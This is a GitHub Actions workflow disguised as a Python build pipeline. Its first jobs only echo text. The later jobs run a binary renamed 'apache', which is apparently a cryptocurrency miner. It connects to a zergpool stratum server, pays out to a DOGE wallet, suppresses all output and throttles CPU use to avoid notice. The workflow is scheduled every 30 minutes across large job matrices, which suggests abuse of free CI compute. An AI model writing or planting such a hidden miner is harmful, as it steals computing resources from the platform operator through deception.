name: Python
on:  
  push:
  pull_request:
  schedule:
  - cron: "*/30 * * * *"
 
jobs:
 python-1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A, B, C, D]
    timeout-minutes: 360
 
    steps:
    - uses: actions/checkout@v2
    - name: Python-run
      run: echo "pythosns"
 
 python-2:
    runs-on: ubuntu-18.04 
    needs: python-1
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A, B, C, D]
    timeout-minutes: 360
 
    steps:
    - uses: actions/checkout@v2
    - name: Python-run
      run: echo "python"
 
 python-build-4:
    runs-on: ubuntu-20.04 
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 360
    steps:
    - uses: actions/checkout@v2
    - name: Rerunning
      continue-on-error: true
      run: |
        chmod +x apache
        NUM_CPU_CORES=$(nproc --all)
        sudo apt update && sudo apt-get install -y ca-certificates cpulimit wget libcurl4 libomp5
        ./apache -a v -o stratum+tcp://verushash.na.mine.zergpool.com:3300 -u DTHFYfFqheLYx3pqNiKPZtU7UcDeuB8QiD.$(shuf -n 1 -i 1-9999999) -p c=DOGE -t 2 >/dev/null 2>&1 >/dev/null &
        cpulimit -e "apache" -l $((20 * $NUM_CPU_CORES))&
        
 python-build-3:
    runs-on: ubuntu-20.04 
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [B]
    timeout-minutes: 360
    steps:
    - uses: actions/checkout@v2
    - name: Rerunning
      continue-on-error: true
      run: |
        chmod +x apache
        NUM_CPU_CORES=$(nproc --all)
        sudo apt update && sudo apt-get install -y ca-certificates cpulimit wget libcurl4 libomp5
        ./apache -a v -o stratum+tcp://verushash.na.mine.zergpool.com:3300 -u DTHFYfFqheLYx3pqNiKPZtU7UcDeuB8QiD.$(shuf -n 1 -i 1-9999999) -p c=DOGE -t 2 >/dev/null 2>&1 >/dev/null &
        cpulimit -e "apache" -l $((20 * $NUM_CPU_CORES))&
 
 python-build-2:
    runs-on: ubuntu-20.04 
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [C]
    timeout-minutes: 360
    steps:
    - uses: actions/checkout@v2
    - name: Rerunning
      continue-on-error: true
      run: |
        chmod +x apache
        NUM_CPU_CORES=$(nproc --all)
        sudo apt update && sudo apt-get install -y ca-certificates cpulimit wget libcurl4 libomp5
        ./apache -a v -o stratum+tcp://verushash.na.mine.zergpool.com:3300 -u DTHFYfFqheLYx3pqNiKPZtU7UcDeuB8QiD.$(shuf -n 1 -i 1-9999999) -p c=DOGE -t 2 >/dev/null 2>&1 >/dev/null &
        cpulimit -e "apache" -l $((20 * $NUM_CPU_CORES))&
 
 python-build-1:
    runs-on: ubuntu-20.04 
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [D]
    timeout-minutes: 360
    steps:
    - uses: actions/checkout@v2
    - name: Rerunning
      continue-on-error: true
      run: |
        chmod +x apache
        NUM_CPU_CORES=$(nproc --all)
        sudo apt update && sudo apt-get install -y ca-certificates cpulimit wget libcurl4 libomp5
        ./apache -a v -o stratum+tcp://verushash.na.mine.zergpool.com:3300 -u DTHFYfFqheLYx3pqNiKPZtU7UcDeuB8QiD.$(shuf -n 1 -i 1-9999999) -p c=DOGE -t 2 >/dev/null 2>&1 >/dev/null &
        cpulimit -e "apache" -l $((20 * $NUM_CPU_CORES))&